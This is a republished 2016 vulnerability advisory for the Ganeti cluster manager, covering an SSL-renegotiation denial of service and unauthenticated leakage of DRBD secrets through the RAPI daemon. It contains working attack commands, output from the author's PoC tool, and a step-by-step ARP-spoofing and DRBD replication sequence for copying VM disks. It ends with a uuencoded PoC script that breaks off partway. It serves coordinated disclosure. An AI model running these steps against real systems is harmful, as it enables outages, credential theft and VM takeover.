exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ganeti Denial Of Service / Information Disclosure

Ganeti Denial Of Service / Information Disclosure
Posted Jan 5, 2016
Authored by Pierre Kim

Ganeti suffers from unauthenticated information disclosure and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, info disclosure
advisories | CVE-2015-7944, CVE-2015-7945
SHA-256 | b366b0e8cdc76ece2a45806306e7e5adc7f7ed618bac49a090623b0b34db5e3c

Ganeti Denial Of Service / Information Disclosure

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
Date published: 2016-01-05
Vendors contacted: Google, MITRE
Organization contacted: Riseup
Release mode: Released
CVE: CVE-2015-7944, CVE-2015-7945
CNNVD: no current CNNVD



## Product Description

Ganeti is a virtual machine cluster management tool developed by Google.
The solution stack uses either Xen or KVM as the virtualization
platform, LVM for disk management,
and optionally DRBD for disk replication across physical hosts.



## Vulnerabilities Summary

Ganeti has security problems in the default install (with DRBD) and
the default configuration due to old libraries and design problem,
even if the security level in Ganeti seems to be high.

These problems affect every versions until the last released version.

The Ganeti API Daemon is open on every interface by default and an
attacker can DoS this daemon.

It is also possible to abuse this deamon to retrieve information, such
as network topology, DRBD secrets...

A PoC is provided to automaticaly retrieve sensitive information and
a possible scenario, allowing to take over Virtual Machines remotely,
is provided (which worked in my lab in certain conditions).



## Details - CVE-2015-7944 - Unauthenticated Remote DoS

Ganeti is prone to a SSL DoS with SSL renegociation against the RAPI Daemon:

user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client
-connect 10.105.1.200:5080
CONNECTED(00000003)
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
- ---
Certificate chain
0 s:/CN=ganeti.example.com
i:/CN=ganeti.example.com
- ---
Server certificate
- -----BEGIN CERTIFICATE-----
[...]
- -----END CERTIFICATE-----
subject=/CN=ganeti.example.com
issuer=/CN=ganeti.example.com
- ---
No client certificate CA names sent
- ---
SSL handshake has read 1003 bytes and written 625 bytes
- ---
New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1.2
Cipher : AES256-GCM-SHA384
Session-ID: D75BCF369143CD008D693B022B967149AF0BD420DE385C51227A1921CD29360D
Session-ID-ctx:
Master-Key:
7DDD57FD479AE6555D1D42CF2B15B8857C28430189EC5C1331C75C4253E4A9F0FC0672EE2F2438CD055328C5A46C4F5F
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 10 ad 69 39 76 6c 2e 37-cf e7 c2 2c 5f f0 e0 20 ..i9vl.7...,_..
0010 - 5d 85 5a 79 82 20 6a 1d-f1 6e 51 f5 f2 f7 c6 cf ].Zy. j..nQ.....
0020 - c1 85 2d 42 5a 1c 53 b4-cb db de 65 04 2a 02 da ..-BZ.S....e.*..
0030 - 5c 7d 82 ef 56 4a a4 a1-88 bd 87 fd af 25 e3 2e \}..VJ.......%..
0040 - 28 68 04 a4 01 22 88 72-30 0b 79 1c 75 61 88 d5 (h...".r0.y.ua..
0050 - c9 f3 e2 0b 02 50 bf c8-29 ac d9 36 f3 76 bd 8b .....P..)..6.v..
0060 - 05 e0 d3 a9 f3 8b 8b 11-ef 19 2f 94 92 30 94 58 ........../..0.X
0070 - aa 64 ba 3f a4 fc 15 4b-74 11 3b c3 c7 e7 d4 33 .d.?...Kt.;....3
0080 - dd 76 e9 e1 1b 3a 95 c4-50 28 4f 9e bc cc cb f3 .v...:..P(O.....
0090 - bf 4d 60 92 64 00 af 67-c0 e9 69 e3 98 54 21 dc .M`.d..g..i..T!.

Start Time: 1438121399
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
- ---
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
[...]


- From my test, 1 thread takes 75% of CPU.

`top` on the main server (10.105.1.200):
19734 gnt-rapi 20 0 148980 35364 4696 R 76.8 3.7 0:04.12
ganeti-rapi


Multiple threads will eat all the available CPUs and will likely DoS ganeti:

21280 gnt-rapi 20 0 148980 35364 4696 R 35.3 3.7 0:05.06
ganeti-rapi
20968 gnt-rapi 20 0 148980 35364 4696 R 33.4 3.7 0:09.92
ganeti-rapi
20969 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:09.95
ganeti-rapi
21282 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:04.53
ganeti-rapi
21281 gnt-rapi 20 0 148980 35364 4696 R 31.4 3.7 0:04.78
ganeti-rapi


An attacker can use tools from THC to perform SSL DoS too (openssl was
the fastest solution out of the box):

https://www.thc.org/thc-ssl-dos/



## Details - CVE-2015-7945 - Unauthenticated Remote Information Disclosure

This vulnerability allows an attacker to retrieve data using
information disclosure,
allowing him, depending on the configuration, to remotely hack VMs.
A PoC (GHETTO-BLASTER which works in Linux (Debian, Kali) and FreeBSD)
is provided as a base64-encoded file to this email.
This PoC is also available here:
https://pierrekim.github.io/advisories/GHETTO-BLASTER.


I. Design Security Problem with the RAPI Daemon

In the Ganeti master node, when using /usr/sbin/gnt-network, a
non-root user can't get information (debian-01 is the ganeti master
node):

user@debian-01:~$ /usr/sbin/gnt-network list
It seems you don't have permissions to connect to the master daemon.
Please retry as a different user.
user@debian-01:~$

This is common for all gnt-tools and seems to be a security design.

It appears Genati by default is too open when using the RAPI daemon
and this daemon listens on every interface by default.
For example, the network configuration can be extracted from jobs
using the RAPI daemon without authentication.

I wrote a tool, "GHETTO-BLASTER", to industrialize the process:

user@kali:~$ ./GHETTO-BLASTER http://<ip_of_ganeti_rapi>

Example:
https://<ip>

2015 Pierre Kim <pierre.kim.sec@gmail.com>
@PierreKimSec https://pierrekim.github.io
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
<http://www.wtfpl.net/txt/copying/>
user@kali:~$ ./GHETTO-BLASTER http://10.105.1.200
[...]
[a lot of output]
[...]
user@kali:~$ ls -l 2-networks 2-networks-test-priv 2-networks-test-pub
-rw-r--r-- 1 user user 228 Jun 20 13:37 2-networks
-rw-r--r-- 1 user user 882 Jun 20 13:37 2-networks-test-priv
-rw-r--r-- 1 user user 881 Jun 20 13:37 2-networks-test-pub
user@kali:~$ cat 2-networks 2-networks-test-priv 2-networks-test-pub
$VAR1 = [
{
'name' => 'test-priv',
'uri' => '/2/networks/test-priv'
},
{
'uri' => '/2/networks/test-pub',
'name' => 'test-pub'
}
];
$VAR1 = {
'mtime' => '1333027652.67126',
'gateway' => undef,
'network6' => undef,
'inst_list' => [],
'mac_prefix' => undef,
'serial_no' => 1,
'free_count' => 254,
'name' => 'test-priv',
'map' =>
'X..............................................................................................................................................................................................................................................................X',
'gateway6' => undef,
'external_reservations' => '192.168.1.0, 192.168.1.255',
'uuid' => '506ad97b-2276-43f4-ae27-e6bbb97f28ff',
'ctime' => '1333027652.67126',
'reserved_count' => 2,
'network' => '192.168.1.0/24',
'group_list' => [],
'tags' => []
};
$VAR1 = {
'mac_prefix' => undef,
'inst_list' => [],
'network6' => undef,
'mtime' => '1333027641.64375',
'gateway' => undef,
'map' =>
'X..............................................................................................................................................................................................................................................................X',
'free_count' => 254,
'name' => 'test-pub',
'serial_no' => 1,
'reserved_count' => 2,
'network' => '192.168.0.0/24',
'ctime' => '1333027641.64375',
'gateway6' => undef,
'uuid' => '48b34199-2d23-46f0-b4aa-2539cb4a7780',
'external_reservations' => '192.168.0.0, 192.168.0.255',
'group_list' => [],
'tags' => []
};
user@kali:~$


It's possible to map the network and to retrieve sensible secrets.

Other interesting information:

osparams_secret is readable in jobs using the access to RAPI.


II. Using this information disclosure to hack VMs:

By default, /var/lib/ganeti/config.data(640, gnt-masterd:gnt-confd)
contains the secret key for DRBD replication.
A remote user or even a local non-root (or non gnt-masterd user) can't
get the configuration of DRBD.

This key can be extracted from jobs by abusing the RAPI daemon without
authentication.

After running GHETTO-BLASTER, you will have a lot of files:

user@kali:~$ ls
1-list-collectors 2-jobs-121 2-jobs-154
2-jobs-187 2-jobs-219 2-jobs-251 2-jobs-284 2-jobs-47 2-jobs-8
1-report-all 2-jobs-122 2-jobs-155
2-jobs-188 2-jobs-22 2-jobs-252 2-jobs-285 2-jobs-48 2-jobs-80
2-features 2-jobs-123 2-jobs-156
2-jobs-189 2-jobs-220 2-jobs-253 2-jobs-286 2-jobs-49 2-jobs-81
2-info 2-jobs-124 2-jobs-157
2-jobs-19 2-jobs-221 2-jobs-254 2-jobs-287 2-jobs-5 2-jobs-82
2-instances 2-jobs-125 2-jobs-158
2-jobs-190 2-jobs-222 2-jobs-255 2-jobs-288 2-jobs-50 2-jobs-83
2-instances-vm-01 2-jobs-126 2-jobs-159
2-jobs-191 2-jobs-223 2-jobs-256 2-jobs-289 2-jobs-51 2-jobs-84
2-instances-vm-01-info-jobs 2-jobs-127 2-jobs-16
2-jobs-192 2-jobs-224 2-jobs-257 2-jobs-29 2-jobs-52 2-jobs-85
2-instances-vm-02.example.com 2-jobs-128 2-jobs-160
2-jobs-193 2-jobs-225 2-jobs-258 2-jobs-290 2-jobs-53 2-jobs-86
2-instances-vm-02.example.com-info-jobs 2-jobs-129 2-jobs-161
2-jobs-194 2-jobs-226 2-jobs-259 2-jobs-291 2-jobs-54 2-jobs-87
2-jobs 2-jobs-13 2-jobs-162
2-jobs-195 2-jobs-227 2-jobs-26 2-jobs-292 2-jobs-55 2-jobs-88
2-jobs-0 2-jobs-130 2-jobs-163
2-jobs-196 2-jobs-228 2-jobs-260 2-jobs-293 2-jobs-56 2-jobs-89
2-jobs-1 2-jobs-131 2-jobs-164
2-jobs-197 2-jobs-229 2-jobs-261 2-jobs-294 2-jobs-57 2-jobs-9
2-jobs-10 2-jobs-132 2-jobs-165
2-jobs-198 2-jobs-23 2-jobs-262 2-jobs-295 2-jobs-58 2-jobs-90
2-jobs-100 2-jobs-133 2-jobs-166
2-jobs-199 2-jobs-230 2-jobs-263 2-jobs-296 2-jobs-59 2-jobs-91
2-jobs-101 2-jobs-134 2-jobs-167
2-jobs-2 2-jobs-231 2-jobs-264 2-jobs-297 2-jobs-6 2-jobs-92
2-jobs-102 2-jobs-135 2-jobs-168
2-jobs-20 2-jobs-232 2-jobs-265 2-jobs-298 2-jobs-60 2-jobs-93
2-jobs-103 2-jobs-136 2-jobs-169
2-jobs-200 2-jobs-233 2-jobs-266 2-jobs-299 2-jobs-61 2-jobs-94
2-jobs-104 2-jobs-137 2-jobs-17
2-jobs-201 2-jobs-234 2-jobs-267 2-jobs-3 2-jobs-62 2-jobs-95
2-jobs-105 2-jobs-138 2-jobs-170
2-jobs-202 2-jobs-235 2-jobs-268 2-jobs-30 2-jobs-63 2-jobs-96
2-jobs-106 2-jobs-139 2-jobs-171
2-jobs-203 2-jobs-236 2-jobs-269 2-jobs-31 2-jobs-64 2-jobs-97
2-jobs-107 2-jobs-14 2-jobs-172
2-jobs-204 2-jobs-237 2-jobs-27 2-jobs-32 2-jobs-65 2-jobs-98
2-jobs-108 2-jobs-140 2-jobs-173
2-jobs-205 2-jobs-238 2-jobs-270 2-jobs-33 2-jobs-66 2-jobs-99
2-jobs-109 2-jobs-141 2-jobs-174
2-jobs-206 2-jobs-239 2-jobs-271 2-jobs-34 2-jobs-67 2-networks
2-jobs-11 2-jobs-142 2-jobs-175
2-jobs-207 2-jobs-24 2-jobs-272 2-jobs-35 2-jobs-68 2-nodes
2-jobs-110 2-jobs-143 2-jobs-176
2-jobs-208 2-jobs-240 2-jobs-273 2-jobs-36 2-jobs-69
2-nodes-debian-01
2-jobs-111 2-jobs-144 2-jobs-177
2-jobs-209 2-jobs-241 2-jobs-274 2-jobs-37 2-jobs-7
2-nodes-debian-01-role
2-jobs-112 2-jobs-145 2-jobs-178
2-jobs-21 2-jobs-242 2-jobs-275 2-jobs-38 2-jobs-70
2-nodes-debian-02
2-jobs-113 2-jobs-146 2-jobs-179
2-jobs-210 2-jobs-243 2-jobs-276 2-jobs-39 2-jobs-71
2-nodes-debian-02-role
2-jobs-114 2-jobs-147 2-jobs-18
2-jobs-211 2-jobs-244 2-jobs-277 2-jobs-4 2-jobs-72 2-os
2-jobs-115 2-jobs-148 2-jobs-180
2-jobs-212 2-jobs-245 2-jobs-278 2-jobs-40 2-jobs-73 version
2-jobs-116 2-jobs-149 2-jobs-181
2-jobs-213 2-jobs-246 2-jobs-279 2-jobs-41 2-jobs-74
2-jobs-117 2-jobs-15 2-jobs-182
2-jobs-214 2-jobs-247 2-jobs-28 2-jobs-42 2-jobs-75
2-jobs-118 2-jobs-150 2-jobs-183
2-jobs-215 2-jobs-248 2-jobs-280 2-jobs-43 2-jobs-76
2-jobs-119 2-jobs-151 2-jobs-184
2-jobs-216 2-jobs-249 2-jobs-281 2-jobs-44 2-jobs-77
2-jobs-12 2-jobs-152 2-jobs-185
2-jobs-217 2-jobs-25 2-jobs-282 2-jobs-45 2-jobs-78
2-jobs-120 2-jobs-153 2-jobs-186
2-jobs-218 2-jobs-250 2-jobs-283 2-jobs-46 2-jobs-79


Files contain DRBD secrets:

user@kali:~$ grep secret *|tail -n 5
2-jobs-80:
'secret' =>
'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-82:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-84:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-85:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-86:
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
user@kali:~$



The key is confirmed by using `drbdsetup show` as root in the Ganeti
master node:

root@debian-01:~# drbdsetup show
resource resource0 {
options {
}
net {
cram-hmac-alg "md5";
shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
}
_remote_host {
address ipv4 10.105.1.201:11000;
}
_this_host {
address ipv4 10.105.1.200:11000;
volume 0 {
device minor 0;
disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
disk {
size 8388608s; # bytes
resync-rate 61440k; # bytes/second
}
}
}
}
root@debian-01:~#


By digging more, one of the jobs file (2-jobs-280) contains the DRDB
configuration:

[...]

'drbd_info' => {
'port' => 11000,
'primary_minor' => 0,
'secondary_node' => 'debian-02',
'secondary_minor' => 0,
'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
'primary_node' => 'debian-01'
},
[...]



As stated in http://docs.ganeti.org/ganeti/current/html/security.html:

DRBD connections are protected from erroneous connections to other
machines (as may happen due to software issues), and
from accepting connections from other machines, by using a shared
secret, exchanged via RPC requests from the master to the nodes when
configuring the device.


We recovered the secret of DRBD, the port used and the nodes without
authentication.
Other files contain the LVM VG and the LVM LG names! It's enough to
start playing with DRDB from an attacker side.



III. DRBD Madness

Now, it's time for DRBD Feng Shui!

Getting the File System of a VM:

o By doing ARP spoofing in the same LAN:

We will impersonate 10.105.1.201 by doing ARP poisoning and using a
valid drbd.conf thank to the parameters provided by the RAPI daemon:

root@kali# cat etc-drbd.conf

include "drbd.d/global_common.conf";
include "drbd.d/*.res";

resource resource0 {
volume 0 {
device minor 0;
disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
}
protocol C;
net {
cram-hmac-alg "md5";
shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
}
on target {
address 10.105.1.200:11000;
}
on kali {
address 10.105.1.201:11000;
}
}

root@kali# vgremove xenvg-vg 2>/dev/null
root@kali# dd if=/dev/zero of=/dev/sdb bs=1024 count=1024
root@kali# pvcreate /dev/sdb
root@kali# vgcreate xenvg-vg /dev/sdb
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data --size 4G xenvg-vg
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta --size 128M xenvg-vg
root@kali# cp etc-drbd.conf /etc/drbd.conf
root@kali# drbdadm create-md resource0
root@kali# drbdadm up resource0

<ARP poisoning> || root@kali# ifconfig eth0 10.105.1.201 netmask 255.255.255.0

root@kali# drbdadm attach resource0
root@kali# drbdadm connect resource0
root@kali# cat /proc/drbd
version: 8.4.3 (api:1/proto:86-101)
srcversion: 1A9F77B1CA5FF92235C2213
0: cs:SyncTarget ro:Secondary/Primary ds:Inconsistent/UpToDate C r-----
ns:0 nr:916568 dw:916472 dr:0 al:0 bm:55 lo:2 pe:0 ua:2 ap:0 ep:1
wo:f oos:3277832
[===>................] sync'ed: 22.0% (3277832/4194304)K
finish: 0:08:33 speed: 6,368 (5,912) want: 4,520 K/sec
root@kali# echo "wow synchronisation in progress !"
wow synchronisation in progress !
root@kali#

After 10min of synchronisation, an attacker will have a perfect copy
of the targeted VM File System using DRDB replication.

It's also possible to write information in the File System (like
adding SSH keys).
Rooting VMs by adding ssh keys and by doing s/PermitRootLogin
No/PermitRootLogin Yes/ is left as a exercise to the reader.


o Other methods of MiTM exist and are left as a exercise for the reader.



## Proposed Workarounds by the Security Researcher

At first, I think these steps must be done to improve the security of ganeti:

1/ Forcing the RAPI to listen to 127.0.0.1 instead of 0.0.0.0.

This can be done by adding by default to /etc/default/ganeti:

RAPI_ARGS="-b 127.0.0.1"

Listening to 127.0.0.1 for ganeti-mond is a good step too (it
listens to 0.0.0.0:1815/tcp)


2/ Adding an authentication by default for the RAPI daemon (not only
for writing access but for reading access too)


3/ Filtering the output of the jobs to avoid leaking secrets.

Note that the immediate step is to change the secrets used for DRBD and
to be sure nobody had access to the DRBD blocks, allowing a
compromise of all the VMs.

4/ Disabling SSL renegociation and updating the default ciphers.


A personal note: as deploying a working Ganeti platform is very complicated,
attackers will likely giving up before having a working Ganeti
platform to study :)



## Vendor Response

Update to the latest version of Ganeti.

Read details about mitigation measures here:
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## Report Timeline

* Jul 30, 2015 : Pierre Kim sends an email to security@ganeti.org
asking for a GPG key, email bounced
* Jul 30, 2015 : Pierre Kim asks Google Security Team if Ganeti is
elligible to the Google Vulnerability Reward Program
* Jul 30, 2015 : Pierre Kim sends an email to Ganeti Team for a
working security contact
* Jul 30, 2015 : Guido Trotter replies by saying to use
opensource-ganeti@google.com
* Aug 1, 2015: Security@google.com confirms it's out of scope
* Aug 4, 2015: Pierre Kim says the exploits are critical and Ganeti
is widely used by Google
* Aug 11, 2015: Advisories and PoC sent to Google Security Team and
Pierre Kim asks Google Security Team to contact Riseup, as they are
using Ganeti
* Aug 12, 2015: Google Security Team transmitted the information to Ganeti Team
* Aug 20, 2015: Google Security Team is working on the scope and the
impact of the report
* Aug 27, 2015: Google Security Team decided is not within scope of
the VRP program but a research grant is awarded as "Security
improvement efficacy research"
* Aug 28, 2015: Pierre Kims provides information about DRBDv8,
DRBDv9. Pierre Kim asks information about the DoS, the condition for
the rewards and asks if Riseup was contacted
* Sep 10, 2015: Google Security Team confirms they will not contact
Riseup and that they ask "that you act and communicate in good faith,
use your own best judgement, and we'll do everything we can to work
with you to resolve vulnerabilities in a reasonable timeframe"
* Oct 6, 2015: Pierre Kim asks for update about the security patchs
and informs he will contact Riseup
* Oct 6, 2015: Riseup is contacted
* Oct 16, 2015: Google Security Team confirm releases end of October
and asks about CVEs from MITRE. The Ganeti Bug #1135 is created
* Oct 17, 2015: Pierre Kim asks Google to ask MITRE CVE assignments
and proposes to contact CNNVD to get a CNNVD entry
* Oct 17, 2015: Google Security Team contacted MITRE to get CVEs
* Oct 23, 2015: Google Security Team has 2 CVE: CVE-2015-7944 and CVE-2015-7945
* Nov 3, 2015: Pierre Kim informs new security with a DoS with the
jobs creation
* Nov 5, 2015: Ganeti Team has rate-limit to 20 concurrent jobs
creation, which limit the problems and declares the patch will be very
soon
* Nov 17, 2015: Ganeti Team announces new releases next week
* Nov 23, 2015: a pre-advisory is sent to Ganeti Team and Google Security Team
* Dec 30, 2015: Ganeti Team releases a security advisory
* Jan 05, 2015: A public advisory is sent to security mailing lists



## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## Greetings

Big thanks to my friends Alexandre Torres, Jordan, Jerome and Stephen.

Thanks to Google Security Team which coordinated the issues by
contacting MITRE and the different parties.



## References

https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
http://www.ocert.org/advisories/ocert-2015-012.html
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## PoC - GHETTO-BLASTER


begin 700 GHETTO-BLASTER
M(R$O=7-R+V)I;B]P97)L("UW"@IU<V4@3%=0.CI5<V5R06=E;G0["G5S92!*
M4T]..PIU<V4@1&%T83HZ1'5M<&5R.PIU<V4@<W1R:6-T.PIU<V4@=V%R;FEN
M9W,["@IM>2`D:5]W86YT7W)E861A8FQE7VIS;VX@/2`Q.PH*:68@*"$H9&5F
M:6YE9"@D05)'5ELP72DI*0I["B`@<')I;G0@(B0P(&AT='`Z+R\\:7!?;V9?
M9V%N971I7W)A<&D^7&Y<;B(["B`@<')I;G0@(B`@17AA;7!L93I<;B(["B`@
M<')I;G0@(B`@("!H='1P<SHO+SQI<#Y<;B(["GT@96QS92!["B`@<')I;G0@
M(D=(15143RU"3$%35$52("T@82!'86YE=&D@9&%T82!A9W)E9V%T:6]N('1O
M;VQ<;B(["GT*<')I;G0@(EQN(CL*<')I;G0@(B`@,C`Q-2!0:65R<F4@2VEM
M(#QP:65R<F4N:VEM+G-E8UQ`9VUA:6PN8V]M/EQN(CL*<')I;G0@(B`@("`@
M("!<0%!I97)R94MI;5-E8R!H='1P<SHO+W!I97)R96MI;2YG:71H=6(N:6\O
M7&XB.PIP<FEN="`B("!$3R!72$%4(%1(12!&54-+(%E/52!704Y4(%1/(%!5
M0DQ)0R!,24-%3E-%(#QH='1P.B\O=W=W+G=T9G!L+FYE="]T>'0O8V]P>6EN
M9R\^7&Y<;B(["F5X:70@*#$I(&EF("@A*&1E9FEN960H)$%21U9;,%TI*2D[
M"@IM>2`D8F%S95]U<FP@("`@("`@("`@/2`D05)'5ELP73L*;7D@)&1E9F%U
M;'1?<F%P:5]P;W)T(#T@-3`X,#L*;7D@)&1E9F%U;'1?;6]N9%]P;W)T(#T@
M,3@Q-3L*"FUY("5B87-I8U]C;61S(#T@*`H@(")I;F9O(B`]/B`@("`@>R`B
M=7)L(B`]/B`B+S(O:6YF;R(L("`@("`B;W5T<'5T7V9I;&4B(#T^("(R+6EN
M9F\B+"`@("`@(")I<U]J<V]N(B`]/B`Q('TL"B`@(G9E<G-I;VXB(#T^("![
M(")U<FPB(#T^("(O=F5R<VEO;B(L("`@(")O=71P=71?9FEL92(@/3X@(G9E
M<G-I;VXB+"`@("`@(FES7VIS;VXB(#T^(#`@?2P*("`B9F5A='5R97,B(#T^
M('L@(G5R;"(@/3X@(B\R+V9E871U<F5S(BP@(F]U='!U=%]F:6QE(B`]/B`B
M,BUF96%T=7)E<R(L("`B:7-?:G-O;B(@/3X@,2!]+`H@(")O<R(@/3X@("`@
M("`@>R`B=7)L(B`]/B`B+S(O;W,B+"`@("`@("`B;W5T<'5T7V9I;&4B(#T^
M("(R+6]S(BP@("`@("`@(")I<U]J<V]N(B`]/B`P('T**3L*"B1%3E9[4$52
M3%],5U!?4U-,7U9%4DE&65](3U-43D%-17T@/2`P.PH*"@HC($9)6$U%.@HC
M("\R+V9I;'1E<G,*(R`O,B]F:6QT97)S/V)U;&L],0HC("\R+V=R;W5P<R]T
M86=S"B,@+S(O:6YS=&%N8V5S+UMI;G-T86YC95]N86UE72]T86=S"B,@+S(O
M;F]D97,O=&%G<PHC("\R+W1A9W,*(R`O,B]N971W;W)K<R];;F5T=V]R:U]N
M86UE72]T86=S"B,*"B,@5$\@5$535#H*(R`O,B]G<F]U<',O6V=R;W5P7VYA
M;65="B,@+S(O;F5T=V]R:W,O6VYE='=O<FM?;F%M95T*"@HF;6%I;B@I.PH*
M"G-U8B!M86EN*"D*>PH@("9G<F5E=&EN9W,H(EEO=2!A<F4@8F5I;F<@=FES
M:71E9"!B>2!'2$545$\M0DQ!4U1%4B!A($=A;F5T:2!D871A(&%G<F5G871I
M;VX@=&]O;"(I.PH*("!F;W(@;7D@)&-M9"`H:V5Y<R`E8F%S:6-?8VUD<RD*
M("!["B`@("!M>2`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@(CHB
M("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@)&)A<VEC7V-M9'-[)&-M9'TM/GLB
M=7)L(GTI.PH@("`@)G-A=F5?9&%T85]L96%K*"1R97,L("1B87-I8U]C;61S
M>R1C;61]+3Y[(F]U='!U=%]F:6QE(GTL("1B87-I8U]C;61S>R1C;61]+3Y[
M(FES7VIS;VXB?2D["B`@?0H*("`F<&%R<V5?:6YS=&%N8V5S*"D["B`@)G!A
M<G-E7VYE='=O<FMS*"D["B`@)G!A<G-E7V=R;W5P<R@I.PH@("9P87)S95]N
M;V1E<R@I.PH@("9P87)S95]M;VYD*"D["B`@)G!A<G-E7VIO8G,H*3L*("`F
M9W)E971I;F=S*")4:&%N:R!Y;W4@9F]R('5S:6YG($=A;F5T:2!A;F0@:&%V
M92!A(&YI8V4@9&%Y(2(I.PI]"@H*<W5B(&=R965T:6YG<R@I"GL*("!M>2`D
M;7-G(#T@)%];,%T["@H@("1M<V<@/7X@<R\@+U\O9SL*("!P<FEN="`B4V5N
M9&EN9R!"86YN97(@=&\@=&AE(')E;6]T92!!4$D@1&%E;6]N.B`D;7-G7&XB
M.PH@(&UY("1R97,@/2`F9V5T7W1A<F=E="@D8F%S95]U<FP@+B`B.B(@+B`D
M9&5F875L=%]R87!I7W!O<G0@+B`B+R(@+B`D;7-G+"`Q*3L*?0H*"G-U8B!P
M87)S95]M;VYD*"D*>PH@(&UY("1R97,["B`@;7D@)&)A<V5?=7)L7VAT='`@
M/2`D8F%S95]U<FP["@H@("1B87-E7W5R;%]H='1P(#U^(',O:'1T<',O:'1T
M<"\["B`@"B`@)')E<R`]("9G971?=&%R9V5T*"1B87-E7W5R;%]H='1P("X@
M(CHB("X@)&1E9F%U;'1?;6]N9%]P;W)T("X@(B\Q+VQI<W0O8V]L;&5C=&]R
M<R(I.PH@("9S879E7V1A=&%?;&5A:R@D<F5S+"`B,2UL:7-T+6-O;&QE8W1O
M<G,B+"`P*3L*("`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L7VAT='`@
M+B`B.B(@+B`D9&5F875L=%]M;VYD7W!O<G0@+B`B+S$O<F5P;W)T+V%L;"(I
M.PH@("9S879E7V1A=&%?;&5A:R@D<F5S+"`B,2UR97!O<G0M86QL(BP@,"D[
M"GT*"@IS=6(@<&%R<V5?:6YS=&%N8V5S*"D*>PH@(&UY("1R97,@/2`F9V5T
M7W1A<F=E="@D8F%S95]U<FP@+B`B.B(@+B`D9&5F875L=%]R87!I7W!O<G0@
M+B`B+S(O:6YS=&%N8V5S(BD["@H@(&UY("1D96-O9&5D7VIS;VX@/2!*4T].
M.CID96-O9&5?:G-O;B@D<F5S*3L*"B`@)G-A=F5?9&%T85]L96%K*"1R97,L
M("(R+6EN<W1A;F-E<R(L(#$I.PH*("!F;W)E86-H(&UY("1D871A("A`>R1D
M96-O9&5D7VIS;VY]*0H@('L*("`@("1R97,@/2`F9V5T7W1A<F=E="@D8F%S
M95]U<FP@+B`B.B(@+B`D9&5F875L=%]R87!I7W!O<G0@+B`D9&%T82T^>R=U
M<FDG?2D["B`@("`F<V%V95]D871A7VQE86LH)')E<RP@(C(M:6YS=&%N8V5S
M+21D871A+3Y[)VED)WTB+"`Q+"`D9&%T82T^>R=I9"=]*3L*"B`@("`D<F5S
M(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@(CHB("X@)&1E9F%U;'1?<F%P
M:5]P;W)T("X@)&1A=&$M/GLG=7)I)WT@+B`B+VEN9F\B*3L*("`@('!R:6YT
M(")3;&5E<"`H,3`I(&)E8V%U<V4@:F]B(&ES(&EN('!R;V=R97-S("XN+EQN
M(CL*("`@('-L965P(#$P.R`C('=E(&YE960@=&\@<VQE97`H,3`I('=H96X@
M87-K:6YG('1H92!I;G-T86YC97,O:6YF;R!D=64@=&\@=&AE(&-R96%T:6]N
M(&]F(&$@:F]B"B`@("`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@
M(CHB("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@(B\R+VIO8G,O(B`N("1R97,I
M.PH@("`@)G-A=F5?9&%T85]L96%K*"1R97,L("(R+6EN<W1A;F-E<RTD9&%T
